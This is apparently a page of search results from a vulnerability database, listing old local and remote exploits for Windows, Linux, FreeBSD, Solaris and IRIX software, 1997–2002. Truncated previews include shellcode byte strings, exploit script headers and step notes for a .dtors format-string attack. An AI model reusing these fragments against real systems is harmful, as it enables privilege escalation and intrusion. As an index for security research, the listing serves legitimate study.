
200 matches found

Exploit DB
added 2002/10/09 12:00 a.m., 59 views

Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)

// source: https://www.securityfocus.com/bid/5927/info The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability BID 5408. A local user can use a WM_COPYDATA message to send arbitrary...

7.4 AI score
Exploits: 0

exploitpack
added 2002/07/24 12:00 a.m., 12 views

CodeBlue 5.1 - SMTP Response Buffer Overflow

CodeBlue 5.1 - SMTP Response Buffer Overflow // source: https://www.securityfocus.com/bid/5300/info CodeBlue is an Apache httpd log scanning utility that attempts to contact the administrators of hosts infected with worms. A buffer overflow vulnerability has been reported in CodeBlue. The conditi...

0.4 AI score
Exploits: 0

Exploit DB
added 2001/07/23 12:00 a.m., 34 views

FreeBSD - '/usr/bin/top' Format String

/ freebsd x86 top exploit affected under top-3.5beta9 including this version 1. get the address of .dtors from /usr/bin/top using objdump , 'objdump -s -j .dtors /usr/bin/top' 2. divide it into four parts, and set it up into an environment variable like "XSEO=" 3. run top, then find "your parted...

7.4 AI score
Exploits: 0

securityvulns
added 2001/03/26 12:00 a.m., 192 views

another format string bug

There is a format string bug in 'pwc' ftp://ftp.media-com.com.pl/pub/other/pwc.tar.gz. This CGI script is used to change users password via www blah!. writelog call syslog function, which 'eats' ; characters and log it to system logs. But you can paste shellcode into buffers512 and syslog will ru...

1.8 AI score
Exploits: 0

Exploit DB
added 2001/01/19 12:00 a.m., 34 views

RedHat 6.1 - 'man' Local Overflow / Local Privilege Escalation

!/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - [email protected] $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b". "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"...

7.4 AI score
Exploits: 0

exploitpack
added 2001/01/19 12:00 a.m., 16 views

RedHat 6.1 - man Local Overflow Local Privilege Escalation

RedHat 6.1 - man Local Overflow Local Privilege Escalation !/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - [email protected] $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"...

1.2 AI score
Exploits: 0

Exploit DB
added 2001/01/15 12:00 a.m., 38 views

Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Local Overflow

!/usr/bin/perl c Copyright [email protected] / anno domani 2000 Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux Tested on: RedHat 4.0/5.1 Greets: scrippie, @HWA, grazer, mixter, pr0ix, s\ http://www.digit-labs.org/ || http://teleh0r.cjb.net/ $shellcode = "\xeb\x1f". / jmp 0x1f / "\x5e". ...

7.4 AI score
Exploits: 0

exploitpack
added 2000/12/15 12:00 a.m., 20 views

Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow

Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow /--oopz.c---//-------------r-3-m-0-t-3---------------\------------- TARGET : oops-1.4.6 one russi4n proxy-server CLASS : remote 0S : FreeBSD 4.0 - 2 AUTH0R : diman VEND0R : wanna payment for support. I'm not doing his job, yeh? DATE :...

1 AI score
Exploits: 0

exploitpack
added 2000/12/06 12:00 a.m., 17 views

gnome_segv - Local Buffer Overflow

gnomesegv - Local Buffer Overflow / gnomesegv local buffer overflow. Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/9/2000 This exploit was coded at overfiens in cali. Shouts to overfien and skeptik... h00t h00t. Bug found by skeptik. Tested on SuSE 6.4/2.2.14...

0.6 AI score
Exploits: 0

Exploit DB
added 2000/12/06 12:00 a.m., 110 views

PHP 3.0.16/4.0.2 - Remote Format Overflow

/ PHP 3.0.16/4.0.2 remote format overflow exploit. Copyright c 2000 Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau [email protected] my regards to sheib and darkx All rights reserved Pascal Boucheraine's paper was enlightening THERE IS NO IMPLIED OR EXPRESS WARRANTY FOR THIS...

7.4 AI score
Exploits: 0

0day.today
added 2000/12/06 12:00 a.m., 38 views

PHP 3.0.16/4.0.2 Remote Format Overflow Exploit

Exploit for linux platform in category remote exploits =============================================== PHP 3.0.16/4.0.2 Remote Format Overflow Exploit =============================================== / PHP 3.0.16/4.0.2 remote format overflow exploit. Copyright c 2000 Field Marshal Count August Ant...

7.1 AI score
Exploits: 0

0day.today
added 2000/12/01 12:00 a.m., 13 views

Solaris sadmind Remote Buffer Overflow Exploit

Exploit for solaris platform in category remote exploits ============================================== Solaris sadmind Remote Buffer Overflow Exploit ============================================== /\ Super Solaris sadmin Exploit by optyx based on sadminsparc. and sadminx86.c by Cheez Whiz /...

7.1 AI score
Exploits: 0

exploitpack
added 2000/11/30 12:00 a.m., 22 views

GLIBC - binsu Local Privilege Escalation

GLIBC - binsu Local Privilege Escalation / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of /bin/su program with the address of the shellcode, so, the program executes it when main returns or exit is called Thanks a lot to...

1.2 AI score
Exploits: 0

0day.today
added 2000/11/30 12:00 a.m., 59 views

GLIBC (via /bin/su) Local Root Exploit

Exploit for linux platform in category local exploits ====================================== GLIBC via /bin/su Local Root Exploit ====================================== / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of...

6.8 AI score
Exploits: 0

Exploit DB
added 2000/11/29 12:00 a.m., 46 views

BFTPd - 'vsprintf()' Format Strings

/ Copyright c 2000 - Security.is The following material may be freely redistributed, provided that the code or the disclaimer have not been partly removed, altered or modified in any way. The material is the property of security.is. You are allowed to adopt the represented code in your programs,...

7 AI score
Exploits: 0

Exploit DB
added 2000/11/19 12:00 a.m., 34 views

solaris/SPARC portbinding shellcode

solaris/SPARC portbinding shellcode. Shellcode exploit for solarissparc platform / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0, %l7 / "\xee\x23\xbf\xec" / st %l7, %sp - 20 / "\x82\x05\xe0\xd6" / add %l7, 214, %g1...

0.3 AI score
Exploits: 0

exploitpack
added 1999/11/30 12:00 a.m., 4 views

Qualcomm qpopper 3.03.0 b20 - Remote Buffer Overflow (1)

Qualcomm qpopper 3.03.0 b20 - Remote Buffer Overflow 1 // source: https://www.securityfocus.com/bid/830/info There is a buffer overflow vulnerability present in current 3.x versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the ho...

0.2 AI score
Exploits: 0

Packet Storm
added 1999/09/22 12:00 a.m., 26 views

crond_exploit.txt

Subject: Crond Scooby Snacks for Everyone. To: [email protected] Paul Vixie loves us all so much it's overflowing. For your own private use, standard disclaimer and transfer of responsibility to that of the end user applies. Oh yeah, and I made it semi-self cleaning just because I love yo...

7.4 AI score
Exploits: 0

Packet Storm
added 1999/09/22 12:00 a.m., 19 views

libtermcap_xterm_exploit.txt

Subject: libtermcap xterm exploit To: [email protected] / libtermcap xterm exploit by m0f0 1999 it works for xterm/nxterm Tested Slackware 3.5, 3.6 / include define BUFSIZE 5000 define POSRET 2000 define POSSEP 3000 define RETADDR 0xbfffefef define EGG "/tmp/eggtermcap" // shellcode char...

7.4 AI score
Exploits: 0

exploitpack
added 1997/05/27 12:00 a.m., 14 views

IRIX 5.3 - usrsbiniwsh Local Buffer Overflow Local Privilege Escalation

IRIX 5.3 - usrsbiniwsh Local Buffer Overflow Local Privilege Escalation / /usr/sbin/iwsh.c exploit by DCRH 27/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 Irix 5.x only compile as: cc iwsh.c / include include include include include define NUMADDRESSES 500 define BUFLENGTH 500 define...

1.2 AI score
Exploits: 0